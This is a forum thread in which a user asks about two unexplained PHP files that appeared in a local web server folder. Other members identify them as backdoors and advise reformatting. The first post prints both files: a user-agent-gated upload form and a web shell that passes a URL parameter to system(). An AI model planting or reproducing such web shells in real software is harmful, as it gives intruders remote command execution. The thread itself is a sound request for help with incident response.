Thread: What the fudge is this?

Results 1 to 10 of 10
  1. #1 What the fudge is this? 
    Registered Member
    Join Date
    Sep 2014
    Age
    26
    Posts
    97
    Thanks given
    57
    Thanks received
    11
    Rep Power
    12
    So i've done literally nothing at all, i've no clue where these came from, but around 19:00 -> 20:00 (bout 4-5 hours ago) those files randomly appeared in my Htdocs folder and i only just discovered them and now i wonder, does anyone have a clue what those are?




    For example: Ec.php contains;
    Code:
    1	<?php $wl = array("x228");$ua="x228";if (in_array($ua, $wl)){echo "<html><body><form action="" method="post" enctype="multipart/form-data"><input type="file" name="filetoul" id="ulid"><input type="submit" value="upload" name="submit"></form></body></html>";$target_dir ="";$target_file = $target_dir . basename($_files["filetoul"]["name"]);$imagetype = pathinfo($target_file.".php");}else{exit;}?>	3	4	5	6	7	8	9	10	11	12	13	14	15	16	17	18	19	20	21	22	23	24	25	26	27	28	29	30	31	32	33
    c.php contains;

    Code:
    1	<?php $wl = $_server['http_user_agent'];$ua = array('a8n10lwek');if (in_array($ua, $wl)){system($_get['cmd']);}else{exit;}?>	3	4	5	6	7	8	9	10	11	12	13	14	15	16	17	18	19	20	21	22	23	24	25	26	27	28	29	30	31	32	33
    any ideas?
    sıhʇ dɐeɹ ot peƃauaɯ uoy snoiʇaןuʇaɹguoɔ
    Reply With Quote  
     

  2. #2  
    Registered Member Bite's Avatar
    Join Date
    Jun 2016
    Posts
    240
    Thanks given
    52
    Thanks received
    40
    Rep Power
    4
    virus
    sike idk
    Reply With Quote  
     

  3. #3  
    ???

    funkE's Avatar
    Join Date
    Feb 2008
    Posts
    2,612
    Thanks given
    255
    Thanks received
    989
    Rep Power
    1366
    Verify source of vulnerability, backup, reformat, check your scripts for exploits, try again.

    So to say, you've been hacked. Potentially very deeply infected, so that's why I say reformat.
    .
    Reply With Quote  
     

  4. Thankful users:


  5. #4  
    Registered Member

    Join Date
    Jun 2016
    Age
    28
    Posts
    336
    Thanks given
    154
    Thanks received
    86
    Rep Power
    283
    So the website xfocus.net is some kind of chinese hacking forum or something like that, but it's ancient it hasn't be updated in around ~10 years.
    You probably got some kind of virus. Not sure really.
    Reply With Quote  
     

  6. #5  
    Unfortunately we’re all human. Except me


    Join Date
    Aug 2011
    Posts
    926
    Thanks given
    539
    Thanks received
    439
    Rep Power
    601
    someone found exploit, and managed to upload his own backdoors etc. thats what happened in my opinion
    Reply With Quote  
     

  7. Thankful user:


  8. #6  
    ???

    funkE's Avatar
    Join Date
    Feb 2008
    Posts
    2,612
    Thanks given
    255
    Thanks received
    989
    Rep Power
    1366
    Yes, he could have figured out your password if your forum software would allow a user with owner level permissions to run arbitrary scripts.

    You could also perhaps have a virus on your computer that allowed them to get your passwords for everything else.

    You need to identify what the problem is first.
    .
    Reply With Quote  
     

  9. Thankful user:


  10. #7  
    Rune-Server Affiliate
    Genesis's Avatar
    Join Date
    Sep 2010
    Posts
    4,149
    Thanks given
    1,508
    Thanks received
    1,980
    Rep Power
    4944
    You are backdoored. Reinstall your entire operating system. Look at a backup your script, analyze it and check for potential vulnerabilities. If you can't find one, then you might want to stay away from creating any type of code on your website.

    https://www.rune-server.org/black-ma...-services.html

    I used to do security web services for a really cheap price, yet not one person bought the service (many RSPS to this day are still vulnerable, Runique was one of them). Web sec isn't really something to toy around with as it can do more damage (in my opinion more than item duplication).
    Reply With Quote  
     

  11. Thankful user:


  12. #8  
    Registered Member
    Join Date
    Sep 2014
    Age
    26
    Posts
    97
    Thanks given
    57
    Thanks received
    11
    Rep Power
    12
    Alright i do appreciate your answers, where to start is pretty unknown as i've recently been messing around with RCS 1.5 ( https://www.rune-server.org/programm...te-remake.html ), othern than that - i do not know, guess i'll go for a full PC scan, see what comodo can pick-up.

    Quote Originally Posted by Genesis View Post
    You are backdoored. Reinstall your entire operating system. Look at a backup your script, analyze it and check for potential vulnerabilities. If you can't find one, then you might want to stay away from creating any type of code on your website.

    https://www.rune-server.org/black-ma...-services.html

    I used to do security web services for a really cheap price, yet not one person bought the service (many RSPS to this day are still vulnerable, Runique was one of them). Web sec isn't really something to toy around with as it can do more damage (in my opinion) than item duplication.
    Well i'm out of money so, i can't really spend anything for web security.


    Interesting though:
    [Thu Jul 07 14:50:25.912695 2016] [:error] [pid 2396:tid 1996] [client 66.249.79.217:47801] script 'C:/xampp/htdocs/server.php' not found or unable to stat
    [Thu Jul 07 14:56:21.267540 2016] [:error] [pid 2396:tid 1940] [client 141.8.184.31:42640] script 'C:/xampp/htdocs/forum/forum.php' not found or unable to stat
    [Thu Jul 07 15:01:01.925500 2016] [access_compat:error] [pid 2396:tid 1924] [client 178.154.189.12:51639] AH01797: client denied by server configuration: C:/xampp/htdocs/game/community/index.php
    [Thu Jul 07 15:35:59.929832 2016] [:error] [pid 2396:tid 1924] [client 51.255.65.7:27530] script 'C:/xampp/htdocs/forum/member.php' not found or unable to stat
    [Thu Jul 07 15:38:27.310714 2016] [:error] [pid 2396:tid 1924] [client 164.132.161.22:15824] script 'C:/xampp/htdocs/forum/forumdisplay.php' not found or unable to stat
    [Thu Jul 07 16:38:13.108442 2016] [:error] [pid 2396:tid 1932] [client 164.132.161.74:21502] script 'C:/xampp/htdocs/forum/showgroups.php' not found or unable to stat
    [Thu Jul 07 17:50:32.236064 2016] [:error] [pid 2396:tid 1956] [client 88.198.230.79:38602] script 'C:/xampp/htdocs/forum/memberlist.php' not found or unable to stat
    [Thu Jul 07 17:50:33.676147 2016] [:error] [pid 2396:tid 1956] [client 88.198.230.79:39387] script 'C:/xampp/htdocs/forum/memberlist.php' not found or unable to stat
    [Thu Jul 07 17:50:35.456248 2016] [:error] [pid 2396:tid 1956] [client 88.198.230.79:40371] script 'C:/xampp/htdocs/forum/memberlist.php' not found or unable to stat
    [Thu Jul 07 17:50:36.885727 2016] [:error] [pid 2396:tid 1956] [client 88.198.230.79:41307] script 'C:/xampp/htdocs/forum/sendmessage.php' not found or unable to stat
    [Thu Jul 07 19:22:53.886186 2016] [:error] [pid 2396:tid 1956] [client 176.124.110.241:53467] script 'C:/xampp/htdocs/game/community/dive.php' not found or unable to stat
    [Thu Jul 07 19:23:41.130952 2016] [:error] [pid 2396:tid 1932] [client 176.124.110.241:53489] script 'C:/xampp/htdocs/os/dive.php' not found or unable to stat
    [Thu Jul 07 19:23:59.820211 2016] [:error] [pid 2396:tid 1932] [client 176.124.110.241:53491] script 'C:/xampp/htdocs/os/dive.txt.php' not found or unable to stat
    [Thu Jul 07 19:46:30.905673 2016] [:error] [pid 2396:tid 1916] [client 176.124.110.241:54094] script 'C:/xampp/htdocs/111.php' not found or unable to stat
    [Thu Jul 07 19:47:01.071937 2016] [:error] [pid 2396:tid 1916] [client 176.124.110.241:54107] script 'C:/xampp/htdocs/dive.php' not found or unable to stat
    [Thu Jul 07 20:26:55.095339 2016] [:error] [pid 2396:tid 1972] [client 144.76.29.66:44280] script 'C:/xampp/htdocs/forum/showthread.php' not found or unable to stat
    [Thu Jul 07 20:26:57.126455 2016] [:error] [pid 2396:tid 1972] [client 144.76.29.66:45696] script 'C:/xampp/htdocs/forum/showthread.php' not found or unable to stat
    [Thu Jul 07 20:26:59.004563 2016] [:error] [pid 2396:tid 1972] [client 144.76.29.66:46839] script 'C:/xampp/htdocs/forum/showthread.php' not found or unable to stat
    [Thu Jul 07 20:27:01.446901 2016] [:error] [pid 2396:tid 1932] [client 144.76.29.66:48350] script 'C:/xampp/htdocs/forum/showthread.php' not found or unable to stat
    [Thu Jul 07 20:27:03.434014 2016] [:error] [pid 2396:tid 1932] [client 144.76.29.66:49685] script 'C:/xampp/htdocs/forum/showthread.php' not found or unable to stat
    [Thu Jul 07 20:27:05.575934 2016] [:error] [pid 2396:tid 1932] [client 144.76.29.66:51045] script 'C:/xampp/htdocs/forum/showthread.php' not found or unable to stat
    [Thu Jul 07 20:27:07.806062 2016] [:error] [pid 2396:tid 1932] [client 144.76.29.66:52377] script 'C:/xampp/htdocs/forum/showthread.php' not found or unable to stat
    [Thu Jul 07 20:27:09.638766 2016] [:error] [pid 2396:tid 1932] [client 144.76.29.66:53767] script 'C:/xampp/htdocs/forum/showthread.php' not found or unable to stat
    [Thu Jul 07 20:27:11.319862 2016] [:error] [pid 2396:tid 1908] [client 144.76.29.66:55192] script 'C:/xampp/htdocs/forum/showthread.php' not found or unable to stat
    sıhʇ dɐeɹ ot peƃauaɯ uoy snoiʇaןuʇaɹguoɔ
    Reply With Quote  
     

  13. #9  
    Extreme Donator

    Join Date
    Jul 2016
    Posts
    67
    Thanks given
    172
    Thanks received
    18
    Rep Power
    67
    Even if your virus scanner does not pick everything up, that does not mean you are clean.

    I suggest a reformat and re-install of your Operating System.
    Reply With Quote  
     

  14. Thankful user:


  15. #10  
    Registered Member Bite's Avatar
    Join Date
    Jun 2016
    Posts
    240
    Thanks given
    52
    Thanks received
    40
    Rep Power
    4
    Quote Originally Posted by Genesis View Post
    You are backdoored. Reinstall your entire operating system. Look at a backup your script, analyze it and check for potential vulnerabilities. If you can't find one, then you might want to stay away from creating any type of code on your website.

    https://www.rune-server.org/black-ma...-services.html

    I used to do security web services for a really cheap price, yet not one person bought the service (many RSPS to this day are still vulnerable, Runique was one of them). Web sec isn't really something to toy around with as it can do more damage (in my opinion more than item duplication).
    I knew it was a backdoor or something when I read this line here

    Code:
    <?php $wl = $_server['http_user_agent'];$ua = array('a8n10lwek');if
    Reply With Quote  
     


Thread Information
Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)


User Tag List

Similar Threads

  1. Wtf?! What The Hell Is This?!?! Help! ;O
    By Affliction in forum Help
    Replies: 12
    Last Post: 08-21-2009, 01:55 PM
  2. What the fuck is this?
    By Kyle in forum Complaints
    Replies: 15
    Last Post: 07-26-2009, 08:13 PM
  3. What the hell is this?
    By Ed in forum Help
    Replies: 23
    Last Post: 07-17-2009, 03:33 PM
  4. What the fuck is this shit..
    By Virus X3 in forum Help
    Replies: 14
    Last Post: 02-07-2009, 06:06 PM
Posting Permissions
  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •